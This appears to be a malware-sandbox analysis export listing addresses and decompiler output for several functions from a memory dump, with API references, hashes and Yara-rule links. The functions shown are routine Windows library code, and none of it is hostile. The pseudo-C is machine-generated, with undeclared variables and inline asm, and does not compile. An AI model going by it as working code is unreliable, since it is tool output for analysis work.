0x0041dbfa
0x0041dbfd
0x0041dc00
0x0041dc06
0x0041dc0d
0x0041dc10
0x0041dc13
0x0041dc19
0x0041dc1c
0x0041dc1e
0x0041dc21
0x0041dc37
0x0041dc3a
0x0041dc3d
0x0041dc40
0x0041dc43
0x0041dc46
0x0041dc4c
0x00000000
0x0041dc23
0x0041dc23
0x0041dc29
0x0041dc29
0x00000000
0x0041dbe3
0x0041dbe3
0x0041dbe9
0x0041dbec
0x0041dbec
0x0041dbe1
0x0041db4f
0x0041db4f
0x0041db4f
0x00000000
0x0041da09
0x0041da09
0x0041da0c
0x0041da0e
0x0041da18
0x0041da1b
0x0041da1d
0x0041da20
0x0041dd10
0x0041dd13
0x0041dd1b
0x0041dd1c
0x0041dd1d
0x0041dd23
0x0041dd28
0x0041dd2c
0x0041da26
0x0041da26
0x0041da29
0x0041da2b
0x0041da2e
0x0041da2f
0x0041da34
0x0041da37
0x0041da39
0x0041da3b
0x0041da3e
0x0041da41
0x0041da42
0x0041da47
0x0041da4a
0x0041da4c
0x0041da50
0x0041da52
0x0041da54
0x0041da57
0x0041da59
0x0041da5d
0x0041da60
0x0041da60
0x0041da68
0x0041da6b
0x0041da6e
0x0041da71
0x0041da71
0x0041da74
0x0041da77
0x0041da7a
0x0041da7a
0x0041da7f
0x0041da84
0x0041da87
0x0041da95
0x0041da95
0x0041da89
0x0041da8c
0x0041da8e
0x0041da8e
0x0041da97
0x0041da9a
0x0041da9d
0x0041daa0
0x0041daa3
0x0041daa6
0x0041daa8
0x0041daaa
0x0041daac
0x0041dab1
0x0041dab1
0x0041dab8
0x0041dabd
0x0041dac0
0x0041dad1
0x0041dad1
0x0041dac2
0x0041dac8
0x0041daca
0x0041daca
0x0041dad3
0x0041dad6
0x0041dad9
0x0041dadb
0x0041dae2
0x0041dae5
0x0041dae8
0x0041daeb
0x0041daee
0x0041daf1
0x0041daf6
0x0041daf9
0x0041db05
0x0041db09
0x0041db0f
0x0041db11
0x0041db13
0x0041db16
0x0041db1b
0x0041db25
0x0041db2b
0x0041db30
0x0041db36
0x0041db3b
0x0041db3e
0x0041dc4f
0x0041dc4f
0x0041dc52
0x0041dc55
0x0041dc57
0x0041dc57
0x0041dc59
0x0041dc5b
0x0041dc61
0x0041dc64
0x0041dc66
0x0041dc69
0x0041dc76
0x0041dc76
0x0041dc6b
0x0041dc6f
0x0041dc6f
0x0041dc78
0x0041dc7f
0x0041dc82
0x0041dc89
0x0041dc8c
0x0041dc8c
0x0041dc59
0x0041dc91
0x0041dc94
0x0041dc96
0x0041dc98
0x0041dc9b
0x0041dca2
0x0041dca3
0x0041dca9
0x0041dcac
0x0041dcb4
0x0041dcb6
0x0041dcb9
0x0041dcbb
0x0041dcbe
0x00000000
0x00000000
0x0041dcc5
0x0041dcd2
0x0041dcd9
0x0041dce0
0x0041dce3
0x0041dce6
0x00000000
0x00000000
0x0041dcc2
0x0041dce8
0x0041dcea
0x0041dcef
0x0041dcf1
0x0041dcf3
0x0041dcf9
0x0041dcf9
0x0041dcfc
0x0041dcff
0x0041dcff
0x0041dcff
0x0041dd02
0x00000000
0x0041dcb1
0x00000000
0x0041dd02
0x0041dcb4
0x0041dd04
0x0041dd07
0x0041dd07
0x0041dd0d
0x0041dd0d
0x00000000
0x0041db1d
0x00415804
0x00415805
0x00415807
0x00415811
0x00415818
0x0041581d
0x0041581e
0x0041581f
0x00415821
0x0041582b
0x00415832
0x00415837
0x00415838
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0041585b
0x0041dafb
0x0041dafb
0x00000000
0x0041dafb
0x0041daf9
0x0041da20

APIs

__EH_prolog3.LIBCMT ref: 0041D9EB
CoTaskMemAlloc.OLE32(?,?), ref: 0041DB09
_memset.LIBCMT ref: 0041DB2B
CoTaskMemFree.OLE32(?), ref: 0041DD07

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: d03386db9c22298eaa345dfbf5ca5f7ac9fe6aefe3f0d7d013accdf3c40788ac
Instruction ID: 05ee87ef6d0b8302c145909e946f356ee315b2d4d95d17fb97b268ba1a75f48f
Opcode Fuzzy Hash: d03386db9c22298eaa345dfbf5ca5f7ac9fe6aefe3f0d7d013accdf3c40788ac
Instruction Fuzzy Hash: AFC11BB0A00709AFCB14DF65C885AAAB7F5FF88304B14891EF816CB390D778E985CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041E87E, Relevance: 6.2, APIs: 4, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041E87E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t159;
				intOrPtr _t160;
				intOrPtr _t161;
				void* _t162;
				void* _t163;
				intOrPtr _t165;
				intOrPtr* _t166;
				void* _t167;
				intOrPtr _t179;

				_push(0x10);
				E004271DA(E0043B021, __ebx, __edi, __esi);
				_t165 = __ecx;
				 *((intOrPtr*)(_t167 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43f3b4;
				 *(_t167 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t165 + 0x24)) != 0) {
						_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x1c)) + 8));
						__eflags = _t159;
						if(_t159 == 0) {
							break;
						}
						_t151 =  *_t159;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t159 + 8)), 0);
						 *((intOrPtr*)( *_t159 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t167 - 0x18)) = _t165 + 0x18;
					E00421909(_t165 + 0x18);
					if( *((intOrPtr*)(_t165 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t165 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t165 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t165 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t165 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t165 + 0x54));
							if( *((intOrPtr*)(_t165 + 0x54)) != 0) {
								E0041D292(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x50)))));
								E00419269( *((intOrPtr*)(_t165 + 0x54)));
							}
							_t160 =  *((intOrPtr*)(_t165 + 0x54));
							_t191 = _t160;
							if(_t160 != 0) {
								E00419269(_t160);
								_push(_t160);
								E0040A3F2(0, _t157, _t160, _t165, _t191);
							}
							_t161 =  *((intOrPtr*)(_t165 + 0x50));
							_t192 = _t161;
							if(_t161 != 0) {
								E0041E65D(_t161, _t192);
								_push(_t161);
								E0040A3F2(0, _t157, _t161, _t165, _t192);
							}
							_t86 =  *((intOrPtr*)(_t165 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t166 =  *((intOrPtr*)(_t165 + 0x48));
							if(_t166 != 0) {
								 *((intOrPtr*)( *_t166 + 8))(_t166);
							}
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							return E004272B2(E00421A04( *((intOrPtr*)(_t167 - 0x18))));
						} else {
							 *((intOrPtr*)(_t167 - 0x10)) = 0;
							if( *((intOrPtr*)(_t165 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t165 + 0x14)));
								goto L32;
							}
							_t162 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24)) + 4));
								 *((intOrPtr*)(_t167 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E0040B523(_t167 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t167 - 0x14)) != 0);
								L28:
								E00421909( *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t167 - 0x10)) =  *((intOrPtr*)(_t167 - 0x10)) + 1;
								_t162 = _t162 + 0x28;
							} while ( *((intOrPtr*)(_t167 - 0x10)) <  *((intOrPtr*)(_t165 + 0x10)));
							goto L31;
						}
					}
					_t163 = 0;
					if( *((intOrPtr*)(_t165 + 0x38)) <= 0) {
						L17:
						if(_t179 != 0) {
							_push( *((intOrPtr*)(_t165 + 0x3c)));
							E0040A3F2(0, _t157, _t163, _t165, _t179);
							_push( *((intOrPtr*)(_t165 + 0x40)));
							E0040A3F2(0, _t157, _t163, _t165, _t179);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t167 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t165 + 0x40)) +  *((intOrPtr*)(_t167 - 0x10)));
						 *((intOrPtr*)(_t167 - 0x10)) =  *((intOrPtr*)(_t167 - 0x10)) + 0x10;
						_t163 = _t163 + 1;
					} while (_t163 <  *((intOrPtr*)(_t165 + 0x38)));
					_t179 =  *((intOrPtr*)(_t165 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_t157 = _t167 - 0x14;
				_push(_t167 - 0x14);
				_push(0x441f84);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t167 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_t157 = _t167 - 0x10;
				_push(_t167 - 0x10);
				_push(0x4420c4);
				 *((intOrPtr*)(_t167 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t167 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t167 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t167 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

APIs

__EH_prolog3.LIBCMT ref: 0041E885
VariantClear.OLEAUT32(?), ref: 0041E949
CoTaskMemFree.OLE32(?,00000010), ref: 0041E9F6
CoTaskMemFree.OLE32(?,00000010), ref: 0041EA04

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: 80fa042e3abaac1a41c2b8f33a60384737edc49b80da36f3ce58171bac672393
Instruction ID: 280745deb0a648077bdbf2c928ea08ec98ad9d9c8138371972030f75bccfc248
Opcode Fuzzy Hash: 80fa042e3abaac1a41c2b8f33a60384737edc49b80da36f3ce58171bac672393
Instruction Fuzzy Hash: C6712879A00602DFCB20DFA6C9C49AEB7F1BF44304754496EE9469B761CB38EC85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4A8, Relevance: 6.2, APIs: 4, Instructions: 173
windowCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0041E4A8(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				intOrPtr* _t72;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				signed int _t81;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t94;
				signed int _t95;
				signed int _t121;
				void* _t138;
				void* _t141;
				intOrPtr* _t142;
				signed int** _t144;
				signed int* _t145;
				signed int _t148;
				signed int _t150;
				void* _t152;
				void* _t155;

				_t138 = __edx;
				_t121 = __ecx;
				_t152 = _t155;
				_t148 = __ecx;
				_t62 =  *((intOrPtr*)(__ecx + 4));
				_push(_t141);
				if(_t62 != 0) {
					_t63 =  *(_t62 + 0x28);
					__eflags = _t63;
					if(_t63 == 0) {
						goto L3;
					} else {
						_t121 = _t63;
						_t67 = E00412138(_t121, __edx, _t141);
						__eflags = _t67;
						_v8 = _t67;
						if(_t67 == 0) {
							goto L3;
						} else {
							_t68 = IsWindowVisible( *(_t67 + 0x20));
							asm("sbb eax, eax");
							_t70 =  ~_t68 + 1;
							__eflags = _t70;
							_v24 = _t70;
							if(_t70 != 0) {
								GetWindowRect( *(E00410E42(0, _t152, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t138;
								E00415A15(_v8, _v56.right - _v56.left - _t138 >> 1, _v56.bottom - _v56.top - _t138 >> 1, 0, 0, 0);
								E00415A53(_v8, 1);
							}
							_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 4)) + 0x50));
							_t142 = _t148 + 0x48;
							_t73 =  *((intOrPtr*)( *_t72))(_t72, 0x43f348, _t142);
							__eflags = _t73;
							if(_t73 < 0) {
								_t75 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 4)) + 0x50));
								_t76 =  *((intOrPtr*)( *_t75))(_t75, 0x43f3a0,  &_v16);
								__eflags = _t76;
								if(_t76 >= 0) {
									_t77 = _v16;
									 *((intOrPtr*)( *_t77 + 0x14))(_t77,  &_v20);
									_t79 = _v16;
									 *((intOrPtr*)( *_t79 + 8))(_t79);
									_t81 = _v20;
									__eflags = _t81;
									if(_t81 != 0) {
										_t144 = _t148 + 8;
										_v12 =  *((intOrPtr*)( *_t81))(_t81, 0x441d94, _t144);
										_t83 = _v20;
										 *((intOrPtr*)( *_t83 + 8))(_t83);
										_t76 = _v12;
										__eflags = _t76;
										if(__eflags >= 0) {
											_t145 =  *_t144;
											 *( *_t145)(_t145, 0x441d84, _t148 + 0xc);
											goto L20;
										}
									} else {
										_t76 = 0x80004005;
									}
								}
							} else {
								_t94 =  *_t142;
								_t145 = _t148 + 0x4c;
								_t95 =  *((intOrPtr*)( *_t94 + 0xc))(_t94, 0, 0x442014, _t145);
								__eflags =  *_t145;
								_v12 = _t95;
								if( *_t145 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L20:
									_t87 = E0041D9D2(0, _t148, _t145, _t148, __eflags);
									__eflags = _v24;
									_t150 = _t87;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E00415A15(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E00415A53(_v8, 0);
									}
									_t76 = _t150;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E00415A15(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E00415A53(_v8, 0);
									}
									_t76 = _v12;
								}
							}
							return _t76;
						}
					}
				} else {
					L3:
					_push(_t152);
					_push(_t121);
					_t2 =  &_v76; // 0x44e938
					_v76 = 0x44e9d0;
					E00429326(_t2, 0x448990);
					asm("int3");
					_t66 = _t121;
					 *((intOrPtr*)(_t66 + 4)) = 1;
					return _t66;
				}
			}

APIs

IsWindowVisible.USER32(?), ref: 0041E4D9
GetDesktopWindow.USER32 ref: 0041E4E9
GetWindowRect.USER32 ref: 0041E502
GetWindowRect.USER32 ref: 0041E50E

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: 91f3dabe833c9e8fd0501810abfa2945bc11cbf6981de9ef4f3e2dc2afdddab8
Instruction ID: 065e16437cb013eb7775d7e254ef6c980541ab395ef9088f91af82c3a1d6bdba
Opcode Fuzzy Hash: 91f3dabe833c9e8fd0501810abfa2945bc11cbf6981de9ef4f3e2dc2afdddab8
Instruction Fuzzy Hash: A551F975A0060AEFCB00DFA9C984CEEB7B9EF88344B64456AF505E7261C734AD80CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00414EBE, Relevance: 6.1, APIs: 4, Instructions: 132
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414EBE(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t102 = _a4;
				_t100 = __ecx;
				E004277B0(__ecx, _t102, 0, 0x128);
				E00414516(_t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x43f774; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E00414BED( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E00414D07(0,  &_v36, _t101,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E00414BED( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E00414D07(0,  &_v36, _t101,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E00414BED( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E00414D07(0,  &_v36, _t101,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}

APIs

_memset.LIBCMT ref: 00414ED5

Part of subcall function 00414516: _wctomb_s.LIBCMT ref: 00414526

GetFileTime.KERNEL32(?,?,?,?), ref: 00414F0C
GetFileSize.KERNEL32(?,00000000), ref: 00414F21

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: d6e0b33cdd3456abbaf0845211ed6f1b0bd95a8d5a4668eaf176b5079c58f16d
Instruction ID: 23fea5bd0db28a64f34b1a5e744c4fd6cae80ca152edd476642d3e85ee4241de
Opcode Fuzzy Hash: d6e0b33cdd3456abbaf0845211ed6f1b0bd95a8d5a4668eaf176b5079c58f16d
Instruction Fuzzy Hash: F0412A719046059FCB20DF69D9818EBB7F8BB483147104A2EE1AAD7790E734F985CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00415DFE, Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00415DFE(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				void* __esi;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E004219BC( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E0040B523( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E0040B523( &_a4)));
								_v8 =  *((intOrPtr*)(E0040B523( &_a4)));
								if((E00415B1A(_t37, 0) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E00415C05( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E00415C05( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E00415B1A(_t63, 0);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

APIs

SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00415E32
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00415E97
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00415EDC
SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 00415F05

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9bce053c1cee47bc9ce1531ae6b29b82336330bcc2760f422429b1ee26c5cdd9
Instruction ID: 0b41f8eff2d773fa09359674444bc7586dee749000be6048f57e8c50777e1ce6
Opcode Fuzzy Hash: 9bce053c1cee47bc9ce1531ae6b29b82336330bcc2760f422429b1ee26c5cdd9
Instruction Fuzzy Hash: 5C319E30900219FFCB25DF55C880EEA7BA9EF81394F14806BF5059B251CB78AE80DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00435032, Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435032(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E004260A5( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0043427F( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00427761(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00435062
__isleadbyte_l.LIBCMT ref: 00435096
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,004339C4,?,?,00000002), ref: 004350C7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,004339C4,?,?,00000002), ref: 00435135

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

